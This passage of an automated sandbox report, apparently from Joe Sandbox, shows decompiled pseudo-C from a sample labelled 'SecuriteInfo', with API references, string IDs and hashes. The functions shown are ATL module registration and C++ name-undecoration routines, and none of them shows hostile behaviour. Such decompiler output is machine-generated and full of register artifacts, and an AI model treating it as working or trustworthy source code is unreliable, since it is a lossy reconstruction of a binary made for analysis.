                      															_t239 = E00941780( &_v16, _t377, __eflags,  &_v16, _v16, 2);
                      															_t382 = _t384 + 0x10;
                      															__eflags = _t239;
                      															if(_t239 >= 0) {
                      																__eflags = _v16 - 0x400;
                      																if(__eflags > 0) {
                      																	L54:
                      																	_v476 = E0094F270(_t287,  &_v40, __eflags, _v16);
                      																	L55:
                      																	_t317 = _v16 >> 1;
                      																	__eflags = _v16 >> 1;
                      																	_v464 = E00941AC0(_v16 >> 1, _t377, _v476, _v32, _t317, _v24);
                      																	L56:
                      																	_v460 = _v464;
                      																	L57:
                      																	_t344 = _v460;
                      																	_v352 = _t344;
                      																	__eflags = _v352;
                      																	if(_v352 != 0) {
                      																		_t377 = _t382;
                      																		__imp__#161(_v352, _a16);
                      																		__eflags = _t382 - _t382;
                      																		_v356 = E009D1520(_a16, _t382 - _t382);
                      																		goto L60;
                      																	}
                      																	_v400 = 0x8007000e;
                      																	E0094F220( &_v40);
                      																	_t205 = _v400;
                      																	goto L64;
                      																}
                      																_t247 = E00941900(__eflags, _v16);
                      																_t382 = _t382 + 4;
                      																__eflags = _t247 & 0x000000ff;
                      																if(__eflags == 0) {
                      																	goto L54;
                      																}
                      																_v468 = _v16 + 0x24;
                      																E009CF1D0(_v468);
                      																_v472 = _t382;
                      																E009D13A0(_v472, _v468,  &_v412);
                      																_v472 = _v472 + 0x20;
                      																_v476 = _v472;
                      																goto L55;
                      															}
                      															_v464 = 0;
                      															goto L56;
                      														}
                      														_v460 = 0;
                      														goto L57;
                      													}
                      													_v396 = 0x80004005;
                      													E0094F220( &_v40);
                      													_t205 = _v396;
                      													goto L64;
                      												}
                      												_v392 = 0x8007000e;
                      												E0094F220( &_v40);
                      												_t205 = _v392;
                      												goto L64;
                      											}
                      											_t255 = E00941900(__eflags, _v16);
                      											_t382 = _t382 + 4;
                      											__eflags = _t255 & 0x000000ff;
                      											if(__eflags == 0) {
                      												goto L39;
                      											}
                      											_v448 = _v16 + 0x24;
                      											E009CF1D0(_v448);
                      											_v452 = _t382;
                      											E009D13A0(_v452, _v448,  &_v412);
                      											_v452 = _v452 + 0x20;
                      											_v456 = _v452;
                      											goto L40;
                      										}
                      										_v444 = 0;
                      										goto L41;
                      									}
                      									_v440 = 0;
                      									goto L42;
                      								}
                      								_v28 = _a8;
                      								__eflags = _v28;
                      								if(__eflags != 0) {
                      									_v16 = E00995A70(_v28) + 1;
                      									_t263 = E00941780( &_v16, _t377, __eflags,  &_v16, _v16, 2);
                      									_t382 = _t382 + 0x10;
                      									__eflags = _t263;
                      									if(_t263 >= 0) {
                      										__eflags = _v16 - 0x400;
                      										if(__eflags > 0) {
                      											L22:
                      											_v436 = E0094F270(_t287,  &_v40, __eflags, _v16);
                      											L23:
                      											_v424 = E00941BB0(_v16, _t377, _v436, _v28, _v16, _v24);
                      											L24:
                      											_v420 = _v424;
                      											L25:
                      											_t344 = _v420;
                      											_v340 = _t344;
                      											__eflags = _v340;
                      											if(_v340 != 0) {
                      												_t269 = E00992E00(_v340);
                      												_t387 = _t382 + 4;
                      												_v344 = _t269;
                      												_v348 = _v328 + _v344;
                      												_t344 = _v348;
                      												__eflags = _t344 - _v328;
                      												if(_t344 < _v328) {
                      													L30:
                      													_v388 = 0x80004005;
                      													E0094F220( &_v40);
                      													_t205 = _v388;
                      													goto L64;
                      												}
                      												__eflags = _v348 - _v344;
                      												if(_v348 < _v344) {
                      													goto L30;
                      												}
                      												__eflags = _v348 - 0x10e;
                      												if(_v348 < 0x10e) {
                      													__eflags = 0x10e;
                      													E009426C0(_t287, _t376, _t377, 0x10e, _t378 + _v328 - 0x13c, 0x10e - _v328, _v340);
                      													_t382 = _t387 + 0xc;
                      													goto L32;
                      												}
                      												goto L30;
                      											}
                      											_v384 = 0x8007000e;
                      											E0094F220( &_v40);
                      											_t205 = _v384;
                      											goto L64;
                      										}
                      										_t276 = E00941900(__eflags, _v16);
                      										_t382 = _t382 + 4;
                      										__eflags = _t276 & 0x000000ff;
                      										if(__eflags == 0) {
                      											goto L22;
                      										}
                      										_v428 = _v16 + 0x24;
                      										E009CF1D0(_v428);
                      										_v432 = _t382;
                      										E009D13A0(_v432, _v428,  &_v412);
                      										_v432 = _v432 + 0x20;
                      										_v436 = _v432;
                      										goto L23;
                      									}
                      									_v424 = 0;
                      									goto L24;
                      								}
                      								_v420 = 0;
                      								goto L25;
                      							}
                      							_v380 = E00941710( &_v320, 0x7a);
                      							E0094F220( &_v40);
                      							_t205 = _v380;
                      							goto L64;
                      						} else {
                      							_v332 = E00942DC0( &_v320, _t377);
                      							_v376 = _v332;
                      							E0094F220( &_v40);
                      							_t205 = _v376;
                      							L64:
                      							E009D13E0(_t287, _t378, 0x94a8d8, _v412);
                      							_t207 = _t205;
                      							_t346 = _t344;
                      							return E00957280(_t207, _t287, _v8 ^ _t378, _t346, _t376, _t377);
                      						}
                      					}
                      				}
                      				_t390 = _a16;
                      				if(_a16 != 0) {
                      					goto L4;
                      				}
                      				goto L2;
                      			}













































































                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?), ref: 0094A2BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: FileModuleName
                      • String ID: $ $ $%ls$.tlb$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$hInstTypeLib != 0$pbstrPath != 0 && ppTypeLib != 0
                      • API String ID: 514040917-3249255110
                      • Opcode ID: 1149041f190565dd23c0b4b518c32bd9ee4fa26a2b9718e2e3ad8ea139221881
                      • Instruction ID: 12df4d702f1efc2cf1191ae3a81961017af6206c613f91d1cb7d57dc4383e876
                      • Opcode Fuzzy Hash: 1149041f190565dd23c0b4b518c32bd9ee4fa26a2b9718e2e3ad8ea139221881
                      • Instruction Fuzzy Hash: 181215B5D402189FDB24DF94DC95BEEB3B4BB88304F1081E9E509AB241DB759E84CF92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00962940(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8) {
                      				intOrPtr _v8;
                      				char _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				char _v68;
                      				char _v76;
                      				intOrPtr _v80;
                      				char _v84;
                      				char _v92;
                      				char _v100;
                      				char _v108;
                      				char _v116;
                      				char _v124;
                      				char _v132;
                      				char _v140;
                      				char _v148;
                      				char _v156;
                      				char _v164;
                      				char _v172;
                      				char _v180;
                      				char _v188;
                      				char _v196;
                      				char _v204;
                      				char _v212;
                      				char _v220;
                      				char* _t80;
                      				intOrPtr _t109;
                      				intOrPtr _t119;
                      				char _t123;
                      				void* _t131;
                      				intOrPtr _t169;
                      				char* _t177;
                      				void* _t181;
                      				void* _t182;
                      				void* _t183;
                      
                      				_t182 = __esi;
                      				_t181 = __edi;
                      				_t131 = __ebx;
                      				_t80 =  *0xb30640; // 0x0
                      				if( *_t80 == 0) {
                      					if(E0096A560(_a8) != 0) {
                      						_v56 = E0095F270( &_v204, 0x5b);
                      						_v60 = E0095FC30(_v56,  &_v212, 1);
                      						E00962CD0(_a4, E0095FBB0(_v60,  &_v220, 0x5d));
                      						return _a4;
                      					}
                      					_v84 = E00960060(")[", 2);
                      					_v80 = _t169;
                      					_v44 = E0095FAD0( &_v172, 0x28, _a8);
                      					_v48 = E0095FB30(_v44,  &_v180,  &_v84);
                      					_v52 = E0095FC30(_v48,  &_v188, 1);
                      					E00962CD0(_a4, E0095FBB0(_v52,  &_v196, 0x5d));
                      					return _a4;
                      				}
                      				_v8 = E00965D80();
                      				if(_v8 < 0) {
                      					_v8 = 0;
                      				}
                      				if(_v8 != 0) {
                      					E0095F3F0( &_v16);
                      					if(E0096A520(_a8) != 0) {
                      						_t123 = E00960060(0x9d8da8, 2);
                      						_t183 = _t183 + 8;
                      						_v68 = _t123;
                      						_v64 = _t169;
                      						E0095FCA0( &_v16,  &_v68);
                      					}
                      					while(E0096A6C0( &_v16) != 0) {
                      						_v28 = _v8;
                      						_v8 = _v8 - 1;
                      						if(_v28 == 0) {
                      							break;
                      						}
                      						_t177 =  *0xb30640; // 0x0
                      						if( *_t177 == 0) {
                      							break;
                      						}
                      						_t119 = E0095FAD0( &_v124, 0x5b, E00964900(_t131, _t181, _t182,  &_v116, 0));
                      						_t183 = _t183 + 0x14;
                      						_v32 = _t119;
                      						E0095FD40( &_v16, E0095FBB0(_v32,  &_v132, 0x5d));
                      					}
                      					if(E0096A560(_a8) == 0) {
                      						if(E0096A520(_a8) == 0) {
                      							_t109 = E0095FAD0( &_v148, 0x28, _a8);
                      							_t183 = _t183 + 0xc;
                      							_v36 = _t109;
                      							_v40 = E0095FBB0(_v36,  &_v156, 0x29);
                      							E0095F820( &_v16, E0095FB70(_v40,  &_v164,  &_v16));
                      						} else {
                      							E0095F820( &_v16, E0095FB70(_a8,  &_v140,  &_v16));
                      						}
                      					}
                      					E00966AB0(_t131, _t181, _t182,  &_v76,  &_v16);
                      					E0096AA80( &_v76);
                      					E0095F240(_a4,  &_v76);
                      					return _a4;
                      				}
                      				_v20 = E0095F270( &_v92, 0x5b);
                      				_v24 = E0095FC30(_v20,  &_v100, 1);
                      				E00962CD0(_a4, E0095FBB0(_v24,  &_v108, 0x5d));
                      				return _a4;
                      			}

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name::operator+$EmptyName::isoperator+
                      • String ID:
                      • API String ID: 2054230242-0
                      • Opcode ID: cafd6eddd1dd8d49ed67f22b918b25518aed7eb6b66d05279d9b1294f4d7a022
                      • Instruction ID: 87e2396baf35698cadfc7b04b7b2430cbb91f32699e6ba16fbb11f03b4d1e71f
                      • Opcode Fuzzy Hash: cafd6eddd1dd8d49ed67f22b918b25518aed7eb6b66d05279d9b1294f4d7a022
                      • Instruction Fuzzy Hash: C3811F71D00208AFDB14EFA5DCA2FFE7779AF84311F508169F909AB191EB706A48CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 78%
                      			E00947640(void* __ebx, void* __ecx) {
                      				signed int _v8;
                      				void* _v12;
                      				CHAR* _v20;
                      				intOrPtr _v28;
                      				signed int _v32;
                      				CHAR* _v36;
                      				char _v44;
                      				char _v312;
                      				struct HINSTANCE__* _v320;
                      				intOrPtr _v324;
                      				signed int _v328;
                      				char _v594;
                      				char _v596;
                      				void* _v608;
                      				signed int _v616;
                      				struct _SHFILEINFOA _v972;
                      				intOrPtr _v980;
                      				intOrPtr _v984;
                      				intOrPtr _v988;
                      				signed int _v992;
                      				signed int _v996;
                      				signed int _v1000;
                      				signed int _v1004;
                      				CHAR* _v1012;
                      				CHAR* _v1020;
                      				CHAR* _v1024;
                      				char* _v1028;
                      				intOrPtr _v1032;
                      				char _v1036;
                      				void* _v1044;
                      				void* __edx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t131;
                      				void* _t145;
                      				void* _t149;
                      				signed int _t156;
                      				void* _t161;
                      				void* _t164;
                      				long _t168;
                      				signed int _t169;
                      				void* _t172;
                      				intOrPtr _t176;
                      				void* _t178;
                      				void* _t181;
                      				void* _t184;
                      				signed char _t188;
                      				struct HINSTANCE__* _t196;
                      				void* _t197;
                      				void* _t200;
                      				void* _t206;
                      				intOrPtr* _t210;
                      				short _t247;
                      				signed int _t251;
                      				void* _t260;
                      				intOrPtr* _t261;
                      				void* _t267;
                      				void* _t268;
                      				signed int _t276;
                      				void* _t277;
                      				intOrPtr _t278;
                      
                      				_t206 = __ebx;
                      				_push(__ecx);
                      				_t267 =  &_v1036;
                      				memset(_t267, 0xcccccccc, 0x102 << 2);
                      				_t278 = _t277 + 0xc;
                      				_t268 = _t267 + 0x102;
                      				_pop(_t210);
                      				_t131 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t131 ^ _t276;
                      				_v12 = _t210;
                      				_v1012 = 0;
                      				_v20 = 0;
                      				_v28 = E00941AB0();
                      				_v32 = 0;
                      				_v36 = 0;
                      				E0094F2E0( &_v44);
                      				_v320 = E00942B10(0xb30220);
                      				_t269 = _t278;
                      				_t213 = _v320;
                      				_v324 = E009D1520(GetModuleFileNameA(_v320,  &_v312, 0x104), _t278 - _t278);
                      				if(_v324 != 0) {
                      					__eflags = _v324 - 0x104;
                      					if(_v324 != 0x104) {
                      						__eflags = _v320;
                      						if(_v320 == 0) {
                      							L6:
                      							_t247 = "\""; // 0x22
                      							_v596 = _t247;
                      							E0095AF80(_t268,  &_v594, 0, 0x104);
                      							E009427B0(_t206, _t268, _t269, __eflags,  &_v596, 0x106,  &_v312);
                      							E009427B0(_t206, _t268, _t269, __eflags,  &_v596, 0x106, "\"");
                      							_t278 = _t278 + 0x24;
                      							_t145 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_v12, "Module",  &_v596);
                      							__eflags = _t278 - _t278;
                      							_v328 = E009D1520(_t145, _t278 - _t278);
                      							L8:
                      							__eflags = _v328;
                      							if(_v328 >= 0) {
                      								_t251 =  *_v12;
                      								_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t251 + 0x14))))(_v12, "Module_Raw",  &_v312);
                      								__eflags = _t278 - _t278;
                      								_v328 = E009D1520(_t149, _t278 - _t278);
                      								__eflags = _v328;
                      								if(_v328 >= 0) {
                      									_t272 = _t278;
                      									__imp__StringFromCLSID(0xb33678,  &_v608);
                      									__eflags = _t278 - _t278;
                      									_v328 = E009D1520( &_v608, _t278 - _t278);
                      									__eflags = _v328;
                      									if(_v328 >= 0) {
                      										_v32 = _v608;
                      										__eflags = _v32;
                      										if(__eflags != 0) {
                      											_v20 = E00995A70(_v32) + 1;
                      											_t156 = E00941780( &_v20, _t272, __eflags,  &_v20, _v20, 2);
                      											_t278 = _t278 + 0x10;
                      											__eflags = _t156;
                      											if(_t156 >= 0) {
                      												__eflags = _v20 - 0x400;
                      												if(__eflags > 0) {
                      													L21:
                      													_v1036 = E0094F270(_t206,  &_v44, __eflags, _v20);
                      													L22:
                      													_v1024 = E00941BB0(_v20, _t272, _v1036, _v32, _v20, _v28);
                      													L23:
                      													_v1020 = _v1024;
                      													L24:
                      													_v616 = _v1020;
                      													do {
                      														__eflags = _v616;
                      														if(__eflags == 0) {
                      															_t161 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0xcd, 0, "%ls", L"pszModuleGUID != 0");
                      															_t278 = _t278 + 0x18;
                      															__eflags = _t161 - 1;
                      															if(_t161 == 1) {
                      																asm("int3");
                      															}
                      														}
                      														__eflags = 0;
                      													} while (0 != 0);
                      													_t164 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_v12, "MODULEGUID", _v616);
                      													__eflags = _t278 - _t278;
                      													_v328 = E009D1520(_t164, _t278 - _t278);
                      													_t274 = _t278;
                      													__imp__CoTaskMemFree(_v608);
                      													__eflags = _t278 - _t278;
                      													E009D1520(_t165, _t278 - _t278);
                      													__eflags = _v328;
                      													if(_v328 >= 0) {
                      														_t168 = SHGetFileInfoA( &_v312, 0,  &_v972, 0x160, 0x2000);
                      														__eflags = _t278 - _t278;
                      														_t169 = E009D1520(_t168, _t278 - _t278);
                      														__eflags = _t169;
                      														if(_t169 != 0) {
                      															_t274 = _t278;
                      															_t251 = _v12;
                      															_t172 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_t251, "MODULETYPE", "LocalServer32");
                      															__eflags = _t278 - _t278;
                      															_v328 = E009D1520(_t172, _t278 - _t278);
                      														} else {
                      															_t274 = _t278;
                      															_t251 =  *((intOrPtr*)( *_v12 + 0x14));
                      															_t184 =  *_t251(_v12, "MODULETYPE", "InprocServer32");
                      															__eflags = _t278 - _t278;
                      															_v328 = E009D1520(_t184, _t278 - _t278);
                      														}
                      														__eflags = _v328;
                      														if(_v328 >= 0) {
                      															_t274 = _t278;
                      															_t261 =  *0xb315ec; // 0xb336c0
                      															_t251 =  *((intOrPtr*)( *_t261 + 0x14));
                      															_t181 =  *_t251(_v12);
                      															__eflags = _t278 - _t278;
                      															_v328 = E009D1520(_t181, _t278 - _t278);
                      														}
                      														_v1004 = _v328;
                      														E0094F220( &_v44);
                      														_t176 = _v1004;
                      													} else {
                      														_t251 = _v328;
                      														_v1000 = _t251;
                      														E0094F220( &_v44);
                      														_t176 = _v1000;
                      													}
                      													goto L37;
                      												}
                      												_t188 = E00941900(__eflags, _v20);
                      												_t278 = _t278 + 4;
                      												__eflags = _t188 & 0x000000ff;
                      												if(__eflags == 0) {
                      													goto L21;
                      												}
                      												_v1028 =  &(_v20[0x24]);
                      												E009CF1D0(_v1028);
                      												_v1032 = _t278;
                      												E009D13A0(_v1032, _v1028,  &_v1012);
                      												_v1032 = _v1032 + 0x20;
                      												_v1036 = _v1032;
                      												goto L22;
                      											}
                      											_v1024 = 0;
                      											goto L23;
                      										}
                      										_v1020 = 0;
                      										goto L24;
                      									}
                      									_v996 = _v328;
                      									E0094F220( &_v44);
                      									_t176 = _v996;
                      									goto L37;
                      								}
                      								_t251 = _v328;
                      								_v992 = _t251;
                      								E0094F220( &_v44);
                      								_t176 = _v992;
                      								goto L37;
                      							}
                      							_t251 = _v328;
                      							_v988 = _t251;
                      							E0094F220( &_v44);
                      							_t176 = _v988;
                      							goto L37;
                      						}
                      						_t269 = _t278;
                      						_t196 = GetModuleHandleA(0);
                      						__eflags = _t278 - _t278;
                      						_t197 = E009D1520(_t196, _t278 - _t278);
                      						__eflags = _v320 - _t197;
                      						if(_v320 != _t197) {
                      							_t274 = _t278;
                      							_t200 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_v12, "Module",  &_v312);
                      							__eflags = _t278 - _t278;
                      							_v328 = E009D1520(_t200, _t278 - _t278);
                      							goto L8;
                      						}
                      						goto L6;
                      					}
                      					_v984 = E00941710(_t213, 0x7a);
                      					E0094F220( &_v44);
                      					_t176 = _v984;
                      					goto L37;
                      				} else {
                      					_v980 = E00942DC0(_t213, _t269);
                      					E0094F220( &_v44);
                      					_t176 = _v980;
                      					L37:
                      					E009D13E0(_t206, _t276, 0x947b50, _v1012);
                      					_t178 = _t176;
                      					_t260 = _t251;
                      					return E00957280(_t178, _t206, _v8 ^ _t276, _t260, _t268, _t274);
                      				}
                      			}

                      APIs
                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 009476C0
                      • _HRESULT_FROM_WIN32.LIBCMTD ref: 0094770A
                        • Part of subcall function 00942DC0: GetLastError.KERNEL32 ref: 00942DCE
                        • Part of subcall function 00942DC0: _HRESULT_FROM_WIN32.LIBCMTD ref: 00942DE2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ErrorFileLastModuleName
                      • String ID: $%ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$InprocServer32$LocalServer32$MODULEGUID$MODULETYPE$Module$Module_Raw$pszModuleGUID != 0
                      • API String ID: 2776309574-3582396993
                      • Opcode ID: 3f34be121d65754223e981054bdbabf2c3ab4720d953009de7426256f44ac67d
                      • Instruction ID: d3a4334c86335241813f92c0102945d3425302c4f678c21c37cbf838b296570d
                      • Opcode Fuzzy Hash: 3f34be121d65754223e981054bdbabf2c3ab4720d953009de7426256f44ac67d
                      • Instruction Fuzzy Hash: 2AE12A76D042299FCB24EF94DC95FEEB7B4AF88304F0041A9E609A7251D7749E85CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00964C20(intOrPtr __edx, intOrPtr _a4) {
                      				signed int _v8;
                      				char _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				signed int _v32;
                      				char _v36;
                      				char _v44;
                      				intOrPtr _v48;
                      				char _v52;
                      				intOrPtr _v56;
                      				char _v60;
                      				char* _v64;
                      				char _v68;
                      				char* _v72;
                      				char _v76;
                      				char* _v80;
                      				char _v84;
                      				char* _v88;
                      				char _v92;
                      				char* _v96;
                      				char _v100;
                      				char _v108;
                      				char _v116;
                      				char _v124;
                      				char _v132;
                      				char _v140;
                      				char* _t62;
                      				intOrPtr _t66;
                      				intOrPtr _t75;
                      				char* _t91;
                      				char* _t92;
                      				char* _t97;
                      				intOrPtr _t104;
                      				signed int _t110;
                      				void* _t112;
                      
                      				_t104 = __edx;
                      				_t62 =  *0xb30640; // 0x0
                      				if( *_t62 != 0) {
                      					E0095F3F0( &_v44);
                      					_t91 =  *0xb30640; // 0x0
                      					if( *_t91 != 0x57) {
                      						if(E009621A0(_t91) == 0 || E00962290() != 0) {
                      							_v20 = 0;
                      						} else {
                      							_v20 = 1;
                      						}
                      						_v24 = _v20;
                      					} else {
                      						_v24 = E009621A0(_t91);
                      					}
                      					if(_v24 == 0) {
                      						_t92 =  *0xb30640; // 0x0
                      						_v36 =  *_t92;
                      						_t66 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t66 + 1;
                      						if(_v36 == 0x57) {
                      							E00964EA0( &_v132);
                      							_t112 = _t112 + 4;
                      						}
                      						goto L21;
                      					} else {
                      						E0095F3F0( &_v16);
                      						_t97 =  *0xb30640; // 0x0
                      						_v32 =  *_t97;
                      						_t75 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t75 + 1;
                      						_v8 = _v32;
                      						_t110 = _v8 - 0x54;
                      						_v8 = _t110;
                      						if(_v8 > 5) {
                      							L18:
                      							E0095F820( &_v44,  &_v16);
                      							L21:
                      							E0095FD40( &_v44, E00964E80( &_v140));
                      							E0095F240(_a4,  &_v44);
                      							return _a4;
                      						}
                      						switch( *((intOrPtr*)(_v8 * 4 +  &M00964E5C))) {
                      							case 0:
                      								_t80 = E00960060("union ", 6);
                      								_t112 = _t112 + 8;
                      								_v60 = _t80;
                      								_v56 = _t110;
                      								E0095F7E0( &_v16,  &_v60);
                      								goto L18;
                      							case 1:
                      								_v68 = E00960060("struct ", 7);
                      								_v64 = __edx;
                      								__edx =  &_v68;
                      								__ecx =  &_v16;
                      								__eax = E0095F7E0(__ecx,  &_v68);
                      								goto L18;
                      							case 2:
                      								_v76 = E00960060("class ", 6);
                      								_v72 = __edx;
                      								__eax =  &_v76;
                      								__ecx =  &_v16;
                      								__eax = E0095F7E0(__ecx,  &_v76);
                      								goto L18;
                      							case 3:
                      								_v100 = E00960060("enum ", 5);
                      								_v96 = __edx;
                      								 &_v116 = E00964EA0( &_v116);
                      								__ecx =  &_v100;
                      								__edx =  &_v124;
                      								__eax = E0095FAA0( &_v124,  &_v100, __eax);
                      								__ecx =  &_v16;
                      								__eax = E0095F820(__ecx, __eax);
                      								goto L18;
                      							case 4:
                      								_v84 = E00960060("coclass ", 8);
                      								_v80 = __edx;
                      								__ecx =  &_v84;
                      								__ecx =  &_v16;
                      								__eax = E0095F7E0(__ecx,  &_v84);
                      								goto L18;
                      							case 5:
                      								_v92 = E00960060("cointerface ", 0xc);
                      								_v88 = __edx;
                      								__edx =  &_v92;
                      								__ecx =  &_v16;
                      								__eax = E0095F7E0(__ecx,  &_v92);
                      								goto L18;
                      						}
                      					}
                      				}
                      				_v52 = E00960060("`unknown ecsu\'", 0xe);
                      				_v48 = _t104;
                      				_v28 = E0095F1F0( &_v108,  &_v52);
                      				E0095FC30(_v28, _a4, 1);
                      				return _a4;
                      			}

                      APIs
                      • DName::operator+.LIBCMTD ref: 00964C62
                        • Part of subcall function 0095FC30: Mailbox.LIBCMTD ref: 0095FC40
                        • Part of subcall function 0095FC30: DName::operator+=.LIBCMTD ref: 0095FC4C
                        • Part of subcall function 0095FC30: Mailbox.LIBCMTD ref: 0095FC58
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00964C72
                      • UnDecorator::doEcsu.LIBCMTD ref: 00964C85
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00964CC4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Iterator_baseIterator_base::_Mailboxstd::_$Decorator::doEcsuName::operator+Name::operator+=
                      • String ID: W$`unknown ecsu'$class $coclass $cointerface $enum $struct $union
                      • API String ID: 4208403871-962625158
                      • Opcode ID: bf0fec3c9eb6c1661185935a8241376e24b1ee29dffe927310137eced9fc3c23
                      • Instruction ID: ff932301ee422a295fc9baa03c92a653e1ddeceb36d6423514b6b9dc5b744805
                      • Opcode Fuzzy Hash: bf0fec3c9eb6c1661185935a8241376e24b1ee29dffe927310137eced9fc3c23
                      • Instruction Fuzzy Hash: 3D616EB1C44208DBDB04EFE4DCA2BEEBBB4BF94305F54812AE51677281EB356608CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00965060(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, char* _a12, intOrPtr _a16) {
                      				char _v8;
                      				intOrPtr _v12;
                      				char _v20;
                      				char _v28;
                      				char _v36;
                      				char _v44;
                      				char _v52;
                      				intOrPtr _t51;
                      				intOrPtr _t61;
                      				char* _t63;
                      				intOrPtr _t66;
                      				intOrPtr _t81;
                      				intOrPtr* _t92;
                      				intOrPtr _t97;
                      				char* _t104;
                      				intOrPtr _t105;
                      				char* _t109;
                      				intOrPtr _t116;
                      				intOrPtr _t125;
                      				intOrPtr _t136;
                      				char* _t139;
                      
                      				E0095F3F0( &_v20);
                      				_t51 =  *0xb30640; // 0x0
